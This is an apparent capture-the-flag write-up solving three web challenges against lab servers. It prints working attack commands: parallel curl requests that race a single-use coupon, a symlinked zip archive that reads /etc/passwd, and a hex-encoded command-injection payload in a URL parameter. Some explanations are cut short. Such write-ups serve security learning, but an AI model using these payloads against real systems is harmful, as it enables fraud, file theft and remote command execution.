This challenge was quite straightforward: we only had a textual input field and the suggestion to use the coupon (DCTF_ADD_MONEY). That coupon could normally be used just a single time, but the goal was to get more money than a single coupon would give you.
The challenge could be solved using just the shell and a one liner:
$ curl --data "code=DCTF_ADD_MONEY" -b "PHPSESSID=abcdefghirandomrandom" "http://10.13.37.2/" & curl --data "code=DCTF_ADD_MONEY" -b "PHPSESSID=abcdefghirandomrandom" "http://10.13.37.2/"
We had a service that allowed you to upload zip files, decompressed them and let you download the contents. There was a comment in the HTML source:
getent passwd | grep someuser | cut ... (sorry, I haven’t saved the specific command).
I created a zip file containing a simbolic link to
$ ln -s /etc/passwd mylink
$ zip archive.zip mylink
I uploaded the archive and… nothing, the website didn’t display my file.
The service allowed you to see the debug logs of the unzip command executed server side and in the logs I could see my link was being extracted correctly, so I tried to manually download the passwd file manipulating the download url of another archive I uploaded earlier and it worked!
Web400 (CSS Engineer)
The php code that allowed you to get the user images used
$ curl "http://10.13.37.5/?id=2&usr=1"
cat: images/2_6.jpg: No such file or directory
and was vulnerable to command injection.
because it constructed the path to output from user input without sanitizing it correctly.
Again, this challenge was doable with a one liner:
$ curl `python2 -c "print 'http://10.13.37.5/?id=0x' + '../*; #'.encode('hex') + '&usr=1"`
The reason this works was because id was used in an SQL query and got converted to a string:
Let us know what you think of this article on twitter @towerofhanoi or leave a comment below!